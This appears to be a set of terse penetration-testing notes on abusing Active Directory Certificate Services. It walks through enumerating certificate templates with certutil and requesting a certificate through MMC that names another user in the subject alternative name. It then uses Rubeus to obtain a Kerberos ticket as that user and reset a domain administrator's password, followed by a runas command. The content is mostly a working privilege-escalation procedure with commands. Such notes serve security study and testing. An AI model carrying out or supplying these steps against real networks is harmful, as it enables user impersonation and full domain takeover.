2.1 KiB
2.1 KiB
Active Directory Certificate Service ADCS
-
Internal CA
-
PKI
-
File system encryption
-
Digital signatures
-
User authentication
-
Certificates will not be revoked after account password reset
Certificate Templates
- Extended/Enhanced Key Usage
- Parameter combination can be exploited
Enumeration
certutil -v -template > ct.txt
Exploitable templates should have the following traits:
Allow EnrollorAllow Full Controlpermissions to request certificate- Find groups by
net user <username> /domain-->Domain Users,Domain Computers
- Find groups by
- Client authentication EKU for Kerberos authentication -->
Client Authentication - Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, -->
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
Certificate Creation
Win+R-->mmc-->File-->Add/Remove Snap-in-->Certificates(Request Certificate if administration account --> Computer Account)- After that in the main menu,
Certificates--> right click onPersonal-->All Tasks-->Request Certificates-->Next-->Next-->More information is required to enroll this certificate-->Common Name-->CN=concerto&&User Principal Nameis the user to impersonate -->OK--> selectUser Request-->Enroll - After that in the main menu,
Personal-->Certificates--> The certificate - Right click certificate -->
All Tasks-->Export-->Yes, export private key-->PFX--> setPassword--> Save
Impersonation
-
Request TGT with the created cert
-
Grab TGT
-
On the machine via
Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to> /domain:<domain name> /dc:<IP of domain controller>
- Select a domain admin via opening
Active Directory Users and Computers
.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser>
runas /user:<domain>\<username of DA> cmd.exe